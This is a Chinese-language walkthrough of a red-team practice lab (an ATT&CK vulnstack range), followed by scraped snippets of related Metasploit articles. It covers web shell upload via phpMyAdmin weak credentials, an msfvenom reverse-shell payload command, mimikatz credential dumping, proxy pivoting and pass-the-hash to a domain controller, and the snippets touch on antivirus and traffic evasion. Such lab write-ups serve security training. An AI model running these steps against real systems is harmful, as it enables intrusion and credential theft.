<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    ATT&CK紅隊實戰靶場初探(一)

    VSole2021-07-23 17:00:18

    一、環境配置

    靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2

    攻擊示意圖:

    靶機統一使用虛擬機搭建

    • web服務器:windows7 ip:192.168.52.143/192.168.154.152
    • 域成員:windows server 2003 ip:192.168.52.141
    • 域控:windows server 2008 ip:192.168.52.138
    • 攻擊機:kali ip:192.168.154.146

    二、外網打點

    nmap掃描ip,看一下開了哪些端口

    開了80和3306,訪問80

    是個探針,知道網站路徑和php版本信息

    上dirsearch掃一下目錄

    有phpMyAdmin

    試下弱口令,root/root進去了

    然后就是getshell,這里參考:https://cloud.tencent.com/developer/article/1540506,用的是日志getshell




    寫完shell蟻劍連上去,成功getshell

    三、內網滲透

    1、用msf生成exe上線,聯動cs

    msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.154.146 LPORT=4444 -f exe -o shell.exe
    

    msf設置


    通過蟻劍上傳木馬,執行

    成功得到session

    打開cs,設置監聽器

    在msf中使用exploit/windows/local/payload_inject模塊,session設置為剛獲得的session

    set payload windows/meterpreter/reverse_http
    


    執行,cs成功上線

    2、信息收集

    (1)mimikatz提取賬號明文密碼

    (2)post/windows/gather/enum_applications模塊獲取軟件列表

    (3)get_local_subnets獲取子網信息+內網流量轉發(msf+proxychains)

    獲得內網網段為192.168.52.0/24


    run autoroute -s 192.168.52.0/24
    


    添加路由讓msf可以掃描網段



    msf運行socks4a模塊,并且修改/etc/proxychains.conf的最后一行為相對應的代理端口

    (4)arp掃描內網存活主機

    (5)PTH攻擊拿下域控



    msf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    msf提權簡單利用
    2023-06-06 09:03:11
    免責聲明請勿利用文章內的相關技術從事非法測試,由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任。將創建的用戶添加到遠程連接組net localgroup Administrators username /add 將創建的用戶添加到管理員組然后即可通過遠程登錄進入本機進行遠程連接至此實驗成功!
    0x00寫在前面本次測試僅供學習使用,如若非法他用,與平臺和本文作者無關,需自行負責!很快會被檢測發現,防守方對攻擊流量回溯分析,就會阻斷攻擊行為。針對加密流量的檢測,傳統的基于特征的檢測已經無法滿足攻擊發展的趨勢,只有通過不斷引入新的檢測思考才能解決。
    MSF+生成流量免殺木馬
    2022-01-14 11:34:16
    在實戰中,即便你繞過了殺毒軟件的檢測,也很有可能會結束在某些流量監控的設備上。MSF可以說其是每一個內網玩家的必用工具。理所當然,這款工具也自然而然地被各大安全廠商分析,捕捉其在命令執行時產生的數據和流量。當我們使用一個沒有做過加密處理的原版工具時,內網中的安全設備會根據我們的流量特征進行判斷,認定我們為惡意進程,從而導致控制中斷。Meterpreter技巧生成后門msfvenom?
    MSF生成payload并放到靶機能夠訪問的服務器上,攻擊者通過釣魚等方式使靶機執行powershell代碼,靶機反彈到msf監聽的端口上建立會話,由此攻擊者可以利用此會話完成攻擊控制靶機。
    生成PayloadMetasploit,輸出c、py格式,可用xor、xor_dynamic、zutto_dekiru編碼器。CobaltStrike,這里選擇使用x64的C語言或Python語言的Shellcode。
    192.168.102.16目標主機系統:win7 192.168.102.17兩臺主機均在虛擬機,同一局域網內互通。
    msf是一個免費框架,可用命令生成一個可監聽的木馬程序。
    MSF監聽設置use?PAYLOAD?name>set?LHOST?192.168.20.128set?LPORT?4444show?options?#查漏補缺exploit
    在最近的CTF比賽中,綜合靶場出現的次數越來越多,這種形式的靶場和真實的內網滲透很像,很貼合實際工作,但我們往往缺少多層網絡的練習環境。本文通過VMware搭建3層網絡,并通過msf進行內網滲透,涉及代理搭建,流量轉發,端口映射等常見內網滲透技術。
    MSF生成綁定證書后門msfvenom?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类